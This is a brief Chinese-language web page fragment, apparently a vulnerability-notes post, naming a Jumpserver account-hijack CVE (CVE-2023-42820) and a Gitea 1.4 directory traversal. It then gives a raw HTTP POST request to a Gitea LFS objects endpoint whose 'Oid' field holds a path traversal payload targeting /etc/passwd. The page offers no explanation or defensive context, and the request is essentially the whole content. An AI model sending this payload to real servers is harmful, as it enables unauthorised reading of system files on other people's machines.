Close

30 6 月, 2024

(CVE-2023-42820)(Gitea 1.4目录穿越)

Jumpserver随机数种子泄露导致账户劫持漏洞(CVE-2023-42820)

POST /root/vulhub1.git/info/lfs/objects
Cache-Control: max-age=0
Accept: application/vnd.git-lfs+json
Cookie: lang=zh-CN; i_like_gitea=7b3a3994aeff5ed0; _csrf=t2uq6mDX0lN23WhuLSumCHsA7Dc6MTcwMjMwMTExOTMxOTQyNzA2NQ%3D%3D

{"Oid":"....../../../etc/passwd","Size":1000000,"User":"a","Password":"a","Repo":"a","Authorization":"a"}